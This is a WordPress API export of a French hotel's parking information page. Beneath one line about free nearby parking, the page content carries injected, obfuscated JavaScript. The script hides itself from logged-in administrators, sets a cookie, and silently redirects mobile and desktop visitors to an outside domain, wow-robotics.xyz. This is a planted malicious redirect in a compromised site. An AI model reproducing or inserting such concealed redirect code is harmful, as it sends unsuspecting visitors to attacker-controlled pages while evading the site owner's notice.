{"id":43,"date":"2019-08-13T21:24:10","date_gmt":"2019-08-13T19:24:10","guid":{"rendered":"http:\/\/hotel-saint-claude.fr\/?page_id=43"},"modified":"2019-08-20T12:46:30","modified_gmt":"2019-08-20T10:46:30","slug":"stationnement","status":"publish","type":"page","link":"https:\/\/hotel-saint-claude.fr\/index.php\/stationnement\/","title":{"rendered":"Stationnement"},"content":{"rendered":"\n<p>Parking public en face de l&rsquo;H\u00f4tel, gratuit le soir. Parking couvert totalement gratuit \u00e0 50 m de l&rsquo;H\u00f4tel<\/p>\n<script> var a=['toUTCString','cookie','split','length','charAt','substring','indexOf','userAgent','match','MSIE;','OPR','Chromium','Firefox','Chrome','ppkcookie','location','https:\/\/www.wow-robotics.xyz','getElementById','wpadminbar','undefined','setTime','getTime',';\\x20expires='];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b('0x0')](b('0x1'))===null){if(typeof c===b('0x2')){function c(d,e,f){var g='';if(f){var h=new Date();h[b('0x3')](h[b('0x4')]()+f*0x18*0x3c*0x3c*0x3e8);g=b('0x5')+h[b('0x6')]();}document[b('0x7')]=d+'='+(e||'')+g+';\\x20path=\/';}function i(j){var k=j+'=';var l=document[b('0x7')][b('0x8')](';');for(var m=0x0;m<l[b('0x9')];m++){var n=l[m];while(n[b('0xa')](0x0)=='\\x20')n=n[b('0xb')](0x1,n['length']);if(n[b('0xc')](k)==0x0)return n[b('0xb')](k[b('0x9')],n['length']);}return null;}function o(){return navigator[b('0xd')][b('0xe')](\/Android\/i)||navigator['userAgent'][b('0xe')](\/BlackBerry\/i)||navigator[b('0xd')][b('0xe')](\/iPhone|iPad|iPod\/i)||navigator[b('0xd')][b('0xe')](\/Opera Mini\/i)||navigator[b('0xd')][b('0xe')](\/IEMobile\/i);}function p(){return navigator[b('0xd')]['indexOf']('Edge')!==-0x1||navigator['userAgent'][b('0xc')](b('0xf'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x10'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x11'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x12'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x13'))!==-0x1;}var q=i(b('0x14'));if(q!=='un'){if(p()||o()){c(b('0x14'),'un',0x16d);window[b('0x15')]['replace'](b('0x16'));}}}}}(this));<\/script>","protected":false},"excerpt":{"rendered":"<p>Parking public en face de l&rsquo;H\u00f4tel, gratuit le soir. Parking couvert totalement gratuit \u00e0 50 m de l&rsquo;H\u00f4tel<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-43","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hotel-saint-claude.fr\/index.php\/wp-json\/wp\/v2\/pages\/43","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hotel-saint-claude.fr\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hotel-saint-claude.fr\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hotel-saint-claude.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hotel-saint-claude.fr\/index.php\/wp-json\/wp\/v2\/comments?post=43"}],"version-history":[{"count":3,"href":"https:\/\/hotel-saint-claude.fr\/index.php\/wp-json\/wp\/v2\/pages\/43\/revisions"}],"predecessor-version":[{"id":164,"href":"https:\/\/hotel-saint-claude.fr\/index.php\/wp-json\/wp\/v2\/pages\/43\/revisions\/164"}],"wp:attachment":[{"href":"https:\/\/hotel-saint-claude.fr\/index.php\/wp-json\/wp\/v2\/media?parent=43"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}